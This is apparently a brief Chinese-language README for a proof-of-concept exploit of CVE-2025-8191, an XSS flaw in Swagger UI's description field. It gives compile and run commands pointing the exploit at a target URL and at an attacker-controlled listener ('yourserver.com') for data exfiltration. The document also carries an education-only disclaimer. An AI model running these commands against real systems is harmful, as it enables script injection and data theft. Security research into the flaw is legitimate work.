此仓库包含针对CVE‑2025‑8191的概念验证(PoC)漏洞利用代码,该漏洞存在于Swagger UI中。
该漏洞允许在“description”字段中进行跨站脚本(XSS)注入,导致在Swagger UI版本≤ 1.0.3下远程执行脚本。
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v
将http://target.com替换为目标Swagger UI URL,将http://yourserver.com替换为用于数据外泄的HTTP监听器。
此代码仅供教育和安全研究目的使用。请勿将其用于未经明确授权的系统。作者对任何滥用行为概不负责。
MIT License